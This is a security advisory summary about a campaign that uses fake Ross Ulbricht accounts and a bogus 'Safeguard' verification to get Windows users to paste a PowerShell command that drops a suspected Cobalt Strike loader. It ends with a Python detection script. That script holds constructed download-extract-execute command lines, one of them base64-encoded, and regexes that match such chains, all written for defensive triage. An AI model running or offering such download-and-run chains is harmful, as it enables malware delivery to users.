Summary:Threat actors are capitalizing on recent news about Ross Ulbricht, founder of the infamous Silk Road marketplace, to trick users into running malware. Using fake but verified accounts on X (formerly Twitter), they direct unsuspecting users to Telegram channels posing as official portals for Ulbricht. There, victims are put through a fake identity verification step called "Safeguard," which has them copy a PowerShell command to the clipboard, paste it into the Windows Run dialog (Win+R) and execute it. The command downloads a ZIP archive containing several files, including an executable suspected to be a Cobalt Strike loader. Cobalt Strike is a post-exploitation framework that attackers frequently use to gain remote access to systems, often as a precursor to ransomware deployment or data theft.
Security Officer Comments:This attack is a variant of the widely used "ClickFix" tactic, rebranded as a CAPTCHA or identity-verification step so that the copy-paste-run sequence appears legitimate. The carefully crafted wording and page design are intended to keep the victim from questioning why a verification step would require running a command. Researchers from Guardio Labs and Infoblox recently documented similar campaigns that use CAPTCHA-style prompts to push PowerShell commands.
Suggested Corrections:Users are strongly advised not to execute commands from unverified sources and not to paste anything into the Windows Run dialog unless they fully understand what it does; no legitimate CAPTCHA or identity check requires running a command. Content that a web page or chat places on the clipboard should be inspected before use, and obfuscation (encoded strings, hidden-window flags, chained download-and-execute steps) is a red flag. Defenders can also use the telemetry this technique leaves behind: a command pasted into the Run dialog is launched by explorer.exe, so powershell.exe started by explorer.exe with a command line that fetches and extracts an archive or carries an encoded payload is worth alerting on. In response to this incident, Telegram reiterated its commitment to monitoring and removing harmful content, stating that its moderators remove millions of violations daily to keep the platform safe.
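The following Python script is an added worked example written for this note; it is not from the advisory, from BleepingComputer or from the researchers cited, and it does not reproduce the actual command used in the campaign (which this summary does not quote). It scores Sysmon-style process-creation events (ParentImage, Image, CommandLine) for the copy-paste-run chain described in the Summary and applies the Suggested Correction about examining pasted commands: a command pasted into the Run dialog shows up as powershell.exe started by explorer.exe, and a command line that combines a hidden window, a download, archive extraction and execution of the result is the shape of this lure. All sample events, the example.invalid URL and the file names are constructed; an -enc payload is decoded (PowerShell reads it as base64-encoded UTF-16LE) so encoding alone does not hide the chain.

```python
import base64
import binascii
import re
from typing import Dict, List

# Indicator families. One family alone is ordinary administrative PowerShell;
# several together in one command line is the copy-paste-run (ClickFix) shape.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "stealth_flags": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass\b|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I),
    "download": re.compile(
        r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "archive_extract": re.compile(r"\bexpand-archive\b|\.zip\b", re.I),
    "execute": re.compile(r"\b(?:iex|invoke-expression|start-process|frombase64string)\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -enc/-EncodedCommand, or '' if none.
    PowerShell expects the blob to be base64 of the script in UTF-16LE."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def score_command(cmdline: str) -> List[str]:
    """Names of the indicator families present in the command line. A -enc
    payload is decoded and scored too, so encoding does not hide the chain."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if ENCODED.search(cmdline):
        hits.append("encoded_command")
    return hits


def classify_event(event: Dict[str, str], min_hits: int = 3) -> Dict[str, object]:
    """Classify one Sysmon Event ID 1 style record. A command typed into Win+R
    is launched by explorer.exe, so explorer.exe -> powershell.exe with a
    download-and-run command line is the telemetry shape of this lure."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    hits = score_command(event.get("CommandLine", ""))
    is_powershell = image.endswith(("\\powershell.exe", "\\pwsh.exe"))
    explorer_parent = parent.endswith("\\explorer.exe")
    if not is_powershell:
        verdict = "ignore"
    elif len(hits) >= min_hits and explorer_parent:
        verdict = "clickfix_likely"
    elif len(hits) >= min_hits:
        verdict = "review"  # same chain from a console: still worth a look
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "explorer_parent": explorer_parent}


# Constructed sample events (assumption: not the campaign's real command, which
# the advisory does not quote; example.invalid is a reserved, non-routable name).
CHAIN = (r"iwr https://example.invalid/v.zip -OutFile $env:TEMP\v.zip; "
         r"Expand-Archive $env:TEMP\v.zip $env:TEMP\v; Start-Process $env:TEMP\v\verify.exe")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_PAYLOAD = base64.b64encode(CHAIN.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # 1: lure pasted into Win+R, download chain in clear text
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": f'powershell -w hidden -ep bypass -c "{CHAIN}"'},
    # 2: same chain, hidden behind -enc
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": "powershell -nop -w hidden -enc " + ENC_PAYLOAD},
    # 3: administrator working interactively from a console
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_PATH,
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    # 4: script started via the Run dialog, nothing fetched from the network
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Verdict per event, in input order."""
    return [classify_event(e)["verdict"] for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{verdict:16} {classify_event(ev)['indicators']}  {ev['CommandLine'][:60]}")
```

Tune min_hits to the environment: an administrator who legitimately runs Invoke-WebRequest from the Run dialog will trip it, and the regexes are deliberately simple, so treat a "clickfix_likely" verdict as a triage-queue entry rather than a final call. The decode step matters because a single -enc flag otherwise hides every other indicator from a plain string match.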
Link(s):https://www.bleepingcomputer.com/ne...ou-into-running-malicious-powershell-scripts/